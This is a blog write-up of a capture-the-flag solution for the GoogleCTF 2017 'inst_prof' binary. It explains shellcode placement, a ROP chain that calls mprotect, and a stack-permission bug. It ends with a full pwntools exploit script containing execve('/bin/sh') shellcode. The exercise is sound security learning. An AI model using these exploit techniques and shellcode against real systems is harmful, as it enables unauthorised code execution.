Hey folks, here as promised – the 2nd blog post about breaking/cracking the GoogleCTF 2017 pwnable challenge “inst_prof”.
This time I wanted to realize the initial idea/vision I had when I first studied the binary’s disassembly. You can read the other blog post if you want to learn more about my first approach/solution, which was a bit more based on what I found in other people’s writeups.
Right, so how do I usually plan to exploit a program/binary/pwnable? My philosophy almost always is KEEP IT SIMPLE. I am no fan of (too/overly) complex solutions and very much prefer simple, direct approaches. You know, KEEPING IT REAL 🙂
So, applied to this situation, all I wanted to do was this:
- Copy shellcode to the stack
- Make the stack area executable
- Jump to the shellcode (by using ROP, of course, due to NX)
In this blog post I’ll give you a quick run through the steps taken, the problems encountered and an overview of the final solution. So enough bla bla, let’s get it on.
It’s of particular importance to take a close look at memory locations and memory protection settings. If things don’t execute then it’s most likely due to missing permissions or some security mechanism that’s preventing us from winning.
Luckily for us, we have this handy make_page_executable function in our binary’s code, which basically takes a “page” (a “block of memory” with a size of 0x1000 bytes) and changes the memory protection flags from “RW-” to “R-X”. Perfect for our purposes as you will see.
In order to change the memory protection of our shellcode memory area, we need to execute some “bootstrap” code which is only possible by utilizing the methodology of Return Oriented Programming (ROP). Thanks to the NX flag being set!
The ROP Chain Idea
The ROP chain we’ll be building is super simple. We just don’t need to do much to get what we want. So the structure is as follows:
    00: pop rdi
    08: address of shellcode-on-stack
    16: make_page_executable()
    24: address of shellcode-on-stack
Which means (translated to English):
- Load the address of our memory block, containing the shellcode, into register rdi
- Call the make_page_executable function (basically enabling code execution there)
- Be lazy and redirect program flow into our shellcode by putting its address as last address on the stack. Reason: The final ret instruction of make_page_executable will then pull it from there and jump to that address.
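To make the layout concrete, here is a minimal Python sketch that packs the four entries into the 32 bytes the CPU will consume. The function name build_rop_chain and the three example addresses are my own placeholders for illustration; the real addresses are only known at runtime.

```python
import struct


def build_rop_chain(pop_rdi, shellcode_addr, make_page_executable):
    """Pack the four 8-byte ROP entries in the order they are consumed."""
    entries = [
        pop_rdi,               # 00: gadget "pop rdi; ret"
        shellcode_addr,        # 08: value popped into rdi (page to unlock)
        make_page_executable,  # 16: called via the gadget's ret
        shellcode_addr,        # 24: target of make_page_executable's final ret
    ]
    # "<4Q" = four little-endian unsigned 64-bit values
    return struct.pack("<4Q", *entries)


# Hypothetical example addresses (assumptions, not taken from a real run)
chain = build_rop_chain(0x555555554bc3, 0x7ffe88588000, 0x555555554a20)
print(len(chain))
```

Note that the shellcode address appears twice: once as the argument for make_page_executable and once as the final return target.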
In the following explanation we’ll use three registers (r13-r15) for pointer operations (and hence “persistence”). As already explained in the previous blog post (please check it out if you want to dig a bit deeper since I just don’t wanna repeat myself too much here) these three registers won’t be modified by the program’s “framework” code. That’s why we can use them for our exploit.
Building a memory structure
First we need to find a nice place to put our shellcode and the 32 bytes (4 QWORDs of 8 bytes each) of ROP chain data.
Important: make_page_executable basically is just a wrapper for mprotect and mprotect expects memory addresses to have a boundary alignment of 0x1000 bytes. So, in order to make this work, we need to adjust our target address (-> where to store our stuff) to be aligned to 0x1000.
A look into the disassembly of make_page_executable shows that it’s a simple wrapper function: it calls mprotect with a size of 0x1000 and flags set to 5, which is PROT_READ | PROT_EXEC. The memory address is passed in register rdi.
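As a small illustration of what those numbers mean, the following sketch decodes a protection value into the “RWX” notation used in this post and checks the alignment requirement. The constants are the usual Linux values for PROT_READ, PROT_WRITE and PROT_EXEC; the helper names describe_prot and is_page_aligned are made up for this example.

```python
PAGE_SIZE = 0x1000

# Linux values of the mprotect protection flags
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4


def describe_prot(flags):
    """Render a protection value in the R/W/X notation used in memory maps."""
    letters = (("R", PROT_READ), ("W", PROT_WRITE), ("X", PROT_EXEC))
    return "".join(ch if flags & bit else "-" for ch, bit in letters)


def is_page_aligned(addr):
    """mprotect only accepts addresses that are a multiple of the page size."""
    return addr % PAGE_SIZE == 0


print(describe_prot(5))
print(is_page_aligned(0x7ffe88588000))
```

The value 5 has the write bit cleared, which becomes important later on.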
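Ok, my plan was to take the current stack pointer (rsp), increment it by 0x1000 (i.e. move ahead 0x1000 bytes) and align the result to 0x1000. The exploit achieves exactly that with a handful of register operations, each sent as its own instruction (see the full listing at the end): mov r15, rsp; add r15, rsi (rsi holds 0x1000 at this point); mov r13, rsi; dec r13; mov r14, r15; and r14, r13; sub r15, r14.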
After that, we have an aligned memory address in r15, which is still in the stack’s memory space but a bit ahead and aligned to 0x1000.
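The pointer arithmetic can be modeled in plain Python to double-check the result. This is only a sketch: the function name aligned_target and the sample rsp value are assumptions, and it relies on rsi holding 0x1000, as noted in the exploit code's comments.

```python
MASK64 = (1 << 64) - 1


def aligned_target(rsp, rsi=0x1000):
    """Mirror the register operations used to find the aligned target page."""
    r15 = rsp                    # mov r15, rsp
    r15 = (r15 + rsi) & MASK64   # add r15, rsi   -> 0x1000 bytes ahead
    r13 = rsi - 1                # mov r13, rsi; dec r13 -> 0xfff
    r14 = r15 & r13              # mov r14, r15; and r14, r13 -> offset in page
    r15 = r15 - r14              # sub r15, r14   -> page boundary
    return r15


# Hypothetical stack pointer value, for illustration only
print(hex(aligned_target(0x7ffe88587e38)))
```

For a stack pointer that is not already page aligned, the result is simply the start of the next page.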
My game plan was to end up with the following memory structure at this specific stack address:
    0x00 - 0x3f: memory area for our shellcode
    0x40 - 0x5f: space for 4 ROP chain entries (8 bytes or 64 bit each)
So next thing to do: copy the shellcode to our “new” stack address, one byte at a time (a mov byte ptr [r15], <byte> followed by an inc r15 for every single byte).
And once this is done, we want the ROP chain to begin at “new-stack-address” + 0x40. So we seek our pointer (here: r15) to that address and start building our ROP chain.
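Here is a rough sketch of how that byte-wise copy translates into a stream of tiny instructions, modeled after the bytes_to_r15 helper in the full listing. The generator name copy_instructions is my own, and it only produces the assembly text; assembling and sending is left out.

```python
def copy_instructions(data):
    """Yield the assembly snippets that write `data` to [r15] byte by byte."""
    for byte in bytearray(data):
        # store one byte at the current write position
        yield "mov byte ptr [r15], %d" % byte
        # advance the write pointer to the next byte
        yield "inc r15; ret"


# First and last two bytes of the shellcode, as a short sample
snippets = list(copy_instructions(b"\x31\xc0\x0f\x05"))
for line in snippets:
    print(line)
```

Every payload byte costs two round trips, so even a short shellcode means a few dozen sends.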
Populating the ROP chain
Simple stuff. We leak the return address of the function that brought us into the template (a pop r13; push r13 pair does the trick). This return address has a PIE offset of 0xb18 and points to an rdtsc instruction.
So what we get from the stack is the real, memory mapped address of that rdtsc instruction. We’ll use that for calculating the other memory addresses we need in the ROP chain.
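The address math boils down to a few additions and subtractions. The sketch below uses the PIE offsets quoted in this post (0xb18 for the leak, 0xbc3 for the “pop rdi” gadget, 0xa20 for make_page_executable); the function name resolve and the sample leak value are hypothetical.

```python
LEAK_OFFSET = 0xb18                  # PIE offset of the leaked return address
POP_RDI_OFFSET = 0xbc3               # PIE offset of the "pop rdi" gadget
MAKE_PAGE_EXECUTABLE_OFFSET = 0xa20  # PIE offset of make_page_executable


def resolve(leaked_ret):
    """Derive the runtime addresses we need from the leaked return address."""
    base = leaked_ret - LEAK_OFFSET
    return {
        "base": base,
        "pop_rdi": base + POP_RDI_OFFSET,
        "make_page_executable": base + MAKE_PAGE_EXECUTABLE_OFFSET,
    }


# Hypothetical leak, for illustration only
addrs = resolve(0x555555554b18)
print(hex(addrs["pop_rdi"]), hex(addrs["make_page_executable"]))
```

The exploit itself never computes the base; it walks from the leaked address to each target directly, which gives the same result.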
Now, let’s build the four ROP chain entries.
ROP chain entry 1
First we’ll place our well known “pop rdi” gadget. This gadget is at PIE offset 0xbc3 and hence (0xbc3-0xb18)= 0xab bytes ahead. We need to change one of our registers to hold exactly this address so that we can push it into the ROP chain.
Since we only have 4 bytes for instructions, we cannot just do a “add r13, 0xab“. Solution: Do 0xab repetitions of “inc r13; ret“. Slow – but works 🙂
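To see why the single add does not fit, compare the encoded sizes. The byte strings below are hand-assembled by me and not taken from the original exploit, so treat them as an assumption you may want to verify with your assembler of choice.

```python
SLOT_SIZE = 4  # the service accepts at most 4 bytes of code per round

# Hand-assembled encodings (assumption, verify with an assembler)
ADD_R13_0XAB = bytearray.fromhex("4981c5ab000000")  # add r13, 0xab
INC_R13_RET = bytearray.fromhex("49ffc5c3")         # inc r13; ret


def fits(code):
    """True if the encoded instruction(s) fit into one 4-byte slot."""
    return len(code) <= SLOT_SIZE


steps = 0xbc3 - 0xb18  # number of "inc r13; ret" rounds needed

print(fits(ADD_R13_0XAB), fits(INC_R13_RET), steps)
```

The add needs a 32-bit immediate here because 0xab does not fit into a sign-extended 8-bit immediate, which pushes it to 7 bytes.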
We then write this address to ROP chain position 0 (currently at r15). This is done by the helper function r13_to_r15_rop(), which simply executes mov [r15], r13.
Once this is done, we seek to the next ROP chain position by adding 8 (one qword) to r15. The helper next_rop_r15() does that by simply inc’ing r15 8 times.
ROP chain entry 2
We want to load rdi with the shellcode’s address (i.e. the start address of our “new”, 0x1000 aligned stack) so we need to push the address here. That’s easy.
ROP chain entry 3
Another calculation. This time we need make_page_executable and that one is at 0xa20 (which is 0xF8 bytes behind our leaked “rdtsc” instruction address).
So we seek there and stuff the address into our chain.
ROP chain entry 4
That’s again easy. We want the last ret of the make_page_executable function to “return” (i.e. “jump”) to our shellcode. So we just push our shellcode’s address in the ROP chain (or “future stack”).
That’s it for ROP! Simple and easy, that’s how I like it 🙂
Now all that’s left is to redirect the program flow by setting the ROP chain as new stack and “ret” into it.
Going for the Kill
We load the stack pointer with the address of our ROP chain (mov rsp, r15; ret) …
… and lean back, self confident, winner-smile on the face, running the exploit code and watching the show unfold …
Uhm…. WHAT?????????????????? NOOOOOOOOOO!!!! WTF???
Let’s find out ….
Band Aid For Our Shellcode (BAFOS) ™
Ok, let’s dive into this. We obviously missed something. radare2 to the rescue!
Setting a raw_input() right before the “trigger ROP chain” instruction, we cause Python to pause. Then, with r2 attached, we set a breakpoint on our call_rbx instruction.
I wonder if there’s something crazy happening in our ROP chain? Do we even reach our shellcode? We’ll inspect this once we hit the breakpoint. So, let’s continue the program flow (r2: dc) and hit Enter to continue the Python flow.
Once r2 triggers the breakpoint, we inspect our ROP chain at r15.
This looks solid. So at 0x7ffe88588000 is our shellcode. Please also note the current memory protection settings (R W). Let’s inspect the shellcode.
Looks good! There’s our shellcode. We’ll now set a breakpoint there and continue the program flow and see whether we actually reach this (shellcode-) place.
Boom. There we go. Shellcode reached.
Now let’s inspect the environment and hunt for weirdnesses that might be reason enough to cause our shellcode to crash. First, memory protection settings – did our ROP-chain mprotect call work as expected?
Look for the entry marked with “*” (and that has rip in the description). Hint: It’s the fourth line from the bottom. This is the current memory page and also rip (current instruction pointer).
Reading this, we can conclude that this part of memory is currently protected “R-X” (which is good, because this means our mprotect call worked and we can now read and execute our shellcode). All good, I’d say. This can’t be the reason for the crash.
Let’s continue and check the registers and hunt for weird stuff / problems.
Ok, WAIT … Our stack pointer rsp (of course – due to coming out of the ROP chain!) is also pointing to the current memory page address – which now is no longer writable (since make_page_executable removed that flag). You can clearly see the red “R X”. Not good. So the shellcode HAS to crash. A simple “push” instruction would lead to a permission violation and cause the crash. Very logical.
Checking the memory map again (scroll up!), it also becomes clear that the memory block BEFORE our new “shellcode area” (a.k.a. “the old stack”) is still protected RW- and is therefore very usable for stack operations. So, in order to get our shellcode working again, we simply pull the rsp 0x1000 bytes down to point to the previous memory block before going for the “/bin/sh” execve syscall.
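A quick back-of-the-envelope check of where rsp sits before and after the fix. This sketch assumes the layout described earlier (ROP chain at page + 0x40, four entries consumed by the time the shellcode runs) and uses the page address from the debugging session above; the helper names are my own.

```python
PAGE_SIZE = 0x1000


def page_of(addr):
    """Start address of the page containing addr."""
    return addr & ~(PAGE_SIZE - 1)


def rsp_at_shellcode_entry(shellcode_page):
    """rsp after all four ROP entries have been popped off the new stack."""
    chain_start = shellcode_page + 0x40
    return chain_start + 4 * 8


page = 0x7ffe88588000                 # shellcode page seen in the debugger
rsp = rsp_at_shellcode_entry(page)    # still inside the now R-X page
fixed_rsp = rsp - 0x1000              # effect of "sub rsp, 0x1000"

print(hex(rsp), hex(fixed_rsp))
```

After the subtraction rsp points into the page right below the shellcode page, which is still RW- and therefore safe for push/pop.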
And since pwntools is awesome, patching/extending the shellcode is done very (!) quickly: we simply prepend asm("sub rsp, 0x1000;nop") to the shellcode before copying it to the stack.
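For those without pwntools at hand, here is a sketch of the same patch using raw bytes, plus a check that the result still fits into the 0x40 bytes reserved for the shellcode. The prefix bytes are my own hand-assembled encoding of sub rsp, 0x1000 followed by nop (an assumption worth verifying); the shellcode bytes are the ones from the full listing.

```python
# Hand-assembled "sub rsp, 0x1000; nop" (assumption, verify with an assembler)
STACK_FIX = bytearray.fromhex("4881ec00100000") + bytearray.fromhex("90")

# execve("/bin/sh") shellcode as used in the full listing
SHELLCODE = bytearray(
    b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c"
    b"\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52"
    b"\x57\x54\x5e\xb0\x3b\x0f\x05"
)

SHELLCODE_AREA = 0x40  # bytes reserved in front of the ROP chain

patched = STACK_FIX + SHELLCODE
print(len(patched), len(patched) <= SHELLCODE_AREA)
```

The patched shellcode stays well within the reserved area, so the ROP chain at offset 0x40 is not overwritten.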
That should do it. Saving. And retrying the exploit. Should work, eh?
Done! Game over – hello flag.txt! 🙂
This solution here is maybe not as elegant as the “read shellcode from STDIN” approach but it is way more dirty/straightforward, since it doesn’t rely on having many easy-to-reach ROP gadgets. I guess in more difficult pwnables gadgets will be scarce, and that is exactly where this will pay off.
That’s it. I’m pretty much done with this binary now and will move on to the medium and hard GoogleCTF pwnables. Will report my findings here, too! 🙂
Take care guys!
PS: Here is the full Python code.
    #!/usr/bin/env python2
    import sys

    from pwn import *

    context.arch = "amd64"
    context.timeout = 60


    # execute a command by sending its assembled representation into the buffer
    # max buffer length: 4 bytes
    def execute(ASM):
        # assemble, pad with nops to fill out all 4 bytes
        CODE = asm(ASM).ljust(4, asm("nop"))
        if len(CODE) > 4:
            print "More than 4 bytes", ASM
            sys.exit()
        p.send(CODE)


    # writes a stream of bytes into memory at r15
    def bytes_to_r15(byteString):
        for b in byteString:
            execute("mov byte ptr [r15], %d" % ord(b))
            execute("inc r15; ret")


    def inc_r13(offset):
        for x in range(offset):
            execute("inc r13; ret")


    def inc_r14(offset):
        for x in range(offset):
            execute("inc r14; ret")


    def inc_r15(offset):
        for x in range(offset):
            execute("inc r15; ret")


    # write r13 value to memory at r15
    def r13_to_r15_rop():
        execute("mov [r15], r13")


    def rsp_to_r15():
        execute("mov r15, rsp; ret")


    # advance r15 by one qword (next ROP chain entry)
    def next_rop_r15():
        for x in range(8):
            execute("inc r15; ret")


    # http://shell-storm.org/shellcode/files/shellcode-806.php
    # 64 bit Linux, execute /bin/sh
    shellcode = (
        "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c"
        "\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52"
        "\x57\x54\x5e\xb0\x3b\x0f\x05"
    )

    # open the process
    if args['REMOTE']:
        p = remote('localhost', 31337)
    else:
        p = process("./inst_prof")

    # print program prompt
    print(p.readline())

    # planned ROP chain
    # 00: pop rdi
    # 08: shellcode-on-stack address
    # 16: make_page_executable
    # 24: shellcode-on-stack address

    log.info("Aligning stack position for carrying shellcode+ROP chain ...")

    # get stack pointer
    rsp_to_r15()

    ###### Next, we move ahead on the stack and align the result to 0x1000 so that mprotect accepts it
    # stack+0x1000 (rsi: 0x1000)
    execute("add r15, rsi; ret")

    # align stack to 0x1000
    execute("mov r13, rsi; ret")
    execute("dec r13; ret")
    execute("mov r14, r15; ret")
    execute("and r14, r13; ret")
    # diff to 0x1000 boundary now in r14
    execute("sub r15, r14; ret")
    # r15 now has a page-boundary compatible address - compatible to mprotect
    # this is now the position of ROP + shellcode

    log.info("Calculated 0x1000 aligned stack position ...")

    # backup this to r14
    execute("mov r14, r15; ret")

    log.info("Copying shellcode to stack ...")

    # copy shellcode to stack (r15)
    # shellcode needs to be patched to pull the stack pointer down 0x1000 bytes first so that
    # we land in the R-W area, since the shellcode needs a R/W stack for push/pop
    bytes_to_r15(asm("sub rsp, 0x1000;nop") + shellcode)

    # restore calculated stack pointer
    execute("mov r15, r14; ret")

    # pop RET address as "leaked" address
    execute("pop r13; push r13")

    # seek to ROP start position (8 qwords)
    inc_r15(8*8)
    # r15 now has the ROP chain address

    # calculate offsets for ROP gadgets (0xb18 is our leaked return address PIE offset)
    pop_rdi_offset = (0xbc3 - 0xb18)               # add
    make_page_executable_offset = (0xb18 - 0xa20)  # subtract

    log.info("Building ROP chain [1/4] ...")

    # seek to "pop rdi" ROP gadget address by inc'ing r13 x times
    for x in range(pop_rdi_offset):
        execute("inc r13; ret")

    # store ROP gadget address at r15 (ROP chain pointer)
    r13_to_r15_rop()

    # seek to next ROP chain entry position
    next_rop_r15()

    log.info("Building ROP chain [2/4] ...")

    # get shellcode address (begin of 0x1000-aligned stack)
    execute("mov r13, r14; ret")
    # and store in ROP chain
    r13_to_r15_rop()

    # seek to next ROP entry
    next_rop_r15()

    log.info("Building ROP chain [3/4] ...")

    # get leaked RET
    execute("pop r13; push r13")

    # seek to address of make_page_executable
    for x in range(make_page_executable_offset):
        execute("dec r13; ret")

    # store address in ROP chain
    r13_to_r15_rop()

    # seek to next ROP entry
    next_rop_r15()

    log.info("Building ROP chain [4/4] ...")

    # get shellcode address (begin of 0x1000-aligned stack) and store in ROP
    # this makes the RET from make_page_executable return there
    execute("mov r13, r14; ret")
    r13_to_r15_rop()

    # that's all! now redirect flow to ROP chain
    log.info("ROP chain build complete - now redirecting program flow and triggering the shellcode ...")

    # get 0x1000-aligned new stack address
    execute("mov r15, r14; ret")

    # seek to 0x40 which is the start of the ROP bytes
    inc_r15(8*8)

    #raw_input()

    # rock'n'roll !
    execute("mov rsp, r15; ret")

    # flush buffers
    p.clean()

    # retrieve flag
    p.send("cat flag.txt\n")

    # go interactive
    p.interactive()